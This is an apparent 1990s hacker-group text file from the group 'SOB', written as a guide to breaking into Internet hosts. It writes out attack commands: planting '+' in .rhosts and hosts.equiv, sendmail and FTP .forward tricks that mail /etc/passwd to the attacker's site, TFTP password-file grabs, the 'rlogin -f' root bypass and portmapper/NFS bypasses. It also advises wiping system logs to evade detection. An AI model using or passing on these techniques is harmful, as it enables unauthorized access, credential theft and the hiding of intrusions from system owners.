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 __________/\         ________      .__    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_____/\_____  \\______   )/______  /  _____/ __ __|__| __| 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  \  /   |   \|    |  _//  ___/ /   \  ___|  |  \  |/ __ |/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\/    |    \    |   \\___ \  \    \_\  \  |  /  / /_/ \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__  /\_______  /______  /____  &gt;  \______  /____/|__\____ |\___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         \/       \/     \/          \/              \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             __  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/  |_  ____   _/  |_|  |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__\/  _ \  \   __\  |  \_/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(  &lt;_&gt; )  |  | |   Y  \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\____/   |__| |___|  /\___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/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___        __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_____/  |_  ___________  ____   _____/  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/    \   __\/ __ \_  __ \/    \_/ __ \   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\  | \  ___/|  | \/   |  \  ___/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/__|  \___  &gt;__|  |___|  /\___  &gt;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/          \/           \/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yncomm [SO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god wanted the net to be secure he would have given it more Dan Farm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)- Introduction... -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is an immense place full of many kinds of sites that peop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whole lives scanning for the dialups to... It is also a foolis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bugs and careless sysadmins. One thing about Internet is certain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one of the best places to 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 I'm not going to give you a STEP BY STEP guide on ha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ing things you find on the "Information Super-Highway" (tm)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hacking on the Internet can be an extremely entailing process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wever take a look at some of the major bugs and allot of maneu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used to attack most places on the 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)- A VERY Brief History... -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ginning the fools at the US Government made a big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his in the end grew so large it split into two networks ARP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NET. ARPANET was dedicated to scientific research and Milinet wa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unication of military sites... Later thousands of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and the internet was bor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)- The Legacy of RLOGIN -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LOGIN must have been designed by a hacker..." Crypt Keeper [SOB], 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easier ways of getting an account on a remote system is to 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.. if your system is trusted you can get in without a passw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 goes off in an empty skull somewhere...) The way to get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to have your site listed in a users .rhosts fil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hosts.equiv in a forma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at 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ai.mit.edu +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+" designates this as a trusted site and it doesn't require a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from the mentioned system logs into that account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 get on a system I suggest you see what .rhosts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with the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ind / -name .rhosts -exec /bin/cat {}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give you a long list that you may want to edit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sure" your access to the system. A good idea is to add a plus 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rhosts.equiv file to make ALL hosts trusted, you should do th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ain roo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echnique to make an .rhosts file on a remote site involves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il Sendmai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ite.name.com 25 &lt;&lt; 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 to:/home/name/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: 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 to: /home/name/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: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ite.name.com +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/bin/sh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666.666.66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sat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is '^]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losed by foreig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login site.name.com -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- Welcome to satan.com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ck works on all Sendmail previous to 5.59 from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rick involving sendmail is to telnet to the site saying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|/bin/echo "yoursite.name +" &gt; /etc/hosts.equi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X and Linux can sometimes be exploited with a HUGE rlogin hol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on most systems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login site.name.com -l -f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- Welcome to site.name.com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%tprof -x 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root and allow you to edi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want to take a look and make sure the system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ssworded "RSH" or remote shell... I found a few systems that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 into and snoop around gathering information that helped me hack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)- FTP and TFTP -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 Protocol has been long abused to get passwd files from ho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bug that still pops up occasional is "ftp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tp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open site.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site.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site.name.com FTP server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quote us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Guest login okay, send ident a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quote cwd ~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Please send login with USER a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quote pas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Guest login okay, access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orks you are in as root and can modify all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TP trick is to login as "anonymous" or "ftp" then sen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ward to the directory. The .forward file should contain "|/bin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@yoursite.com &lt; /etc/passwd". Now mail a letter to "ftp" or "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the passwd file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TP also has a huge bug on some systems. You almost never see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ys... but you never k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ftp site.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&gt; get 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you the actual passwd files on some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)-X Windows-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Windows is a big risk due to the fact they can be monitored remotely..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xwatch.sh file that SHOULD have come with this do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)- Sendmail -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t of versions before sendmail 5.59 had a bug in which you could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"|" then a command...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: "|/bin/mail you@your.site.name &lt; /etc/pass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mail can also be helpful for finding users on a system with the  'exp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vrfy' comman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elnet target.com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host target.com (666.666.666.1), por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target.com Sendmail 5.5/target ready at Sun, 7 July 94 18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&lt;"|/usr/bin/uudec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il alias "decode" can provide you with a nice bug... with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 site name to nearly any account (depending on who owns the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)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cho "your.site.name" | uuencode /home/idiot/.rhosts | mail decode@targ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)- NIS -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, NFS, and almost every other form of RPC is plagued with bugs..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ools almost anyone can get a passwd file from a system running N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ay is to use YPX (tm) which should have come with this doc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tter tools such as RPCToolKit and NFS (by Leendert) which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handling of sites running R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mportant thing to note is that the directory /var/yp contain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host. So if the director /var/yp is world readable or if /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then you have the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a remote (network) file system is mounted by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demon on the machine on which the file system resid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 RPC. The result of this RPC is the file handle of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ile system. As a security measure the mount demo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chine of the request against a list of allowab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list is found in /etc/exports). If the requester's mach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ort list, the mount RPC will of course fail. One could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fitness of this security approach, but in common day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 special feature of the portmapper (alias rpcbind)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this check. The portmapper provides an indirect(or proxy) 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is service is very simple, in that respect that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RPC, send them to the portmapper and it will make the RP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This feature, as you by now probably have guessed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ndirect RPC mount calls. Since the source of the request (in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point of view) is his local machine such a request is ofte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if the local machine is mentioned in the export lis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portable file systems, but with netgroup facilities this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the mount call succeeds, we have a handle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nd there is no stopping us. Using this file hand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NFS requests by directly addressing the remote NF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do this through the portmapper as well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 server doesn't do any further check if the requester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file handle. This gives us the advantage to provide our ow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information (something that can't be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apper's indirect RPC feature). This way it beco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Unix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portmapper bugs are used in Leendert's program NFS, so may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)- Evasion -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wayes has been a good idea to erase your tracks on a remote host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to get yourself out of the system logs (ie. the UTMP, WTMP, sys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s to use a program called ZAP, which AGAIN should b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 NOTE: You must be root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out for updates to this file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___/  /\                          /\  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/  /  / _\________________________/_ \  \  \___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___/  /  /  / /_                           \ \  \  \  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|_____/  /  /  /  / //      SOB MEMBER BOARDS      \ \  \  \  \  \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/__/__/__/__/ /________________________________\ \__\__\__\__\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\  \  \  \  \ \________________________________/ /  /  /  /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\__\__\__\__\/                                \/__/__/__/__/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Utopia             -*SOB WORLD HQ*-           (210) PRI-VITE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ocial Deception         -*SOB USHQ*-             (606) 261-34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rrested Development    -*SOB Holland HQ*-           +31-77-54747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Lucid Nightmare       -*SOB Eastern HQ*-          (703) 758-165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elestial Woodlands      -*SOB Dist. S.*-           (409) 764-284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Purple Hell           -*SOB Dist. S.*-           (806) 791-0747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Paradise Lost          -*SOB Dist. S.*-           (414) 476-318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yberspace.net       -*SOB I-Net Dist. S.*-           /pub/SO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__________________                                  ______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/  /  /  /  /\________________________________/\  \  \  \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/__/__/__/__/ /________________________________\ \__\__\__\__\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\  \  \  \  \ \                              _ / /  /  /  /  /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\__\  \  \  \ \                             // /  /  /  /__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\__\  \  \ \____________________________/ /  /  /__/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\  \  /                        \  /  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\/                          \/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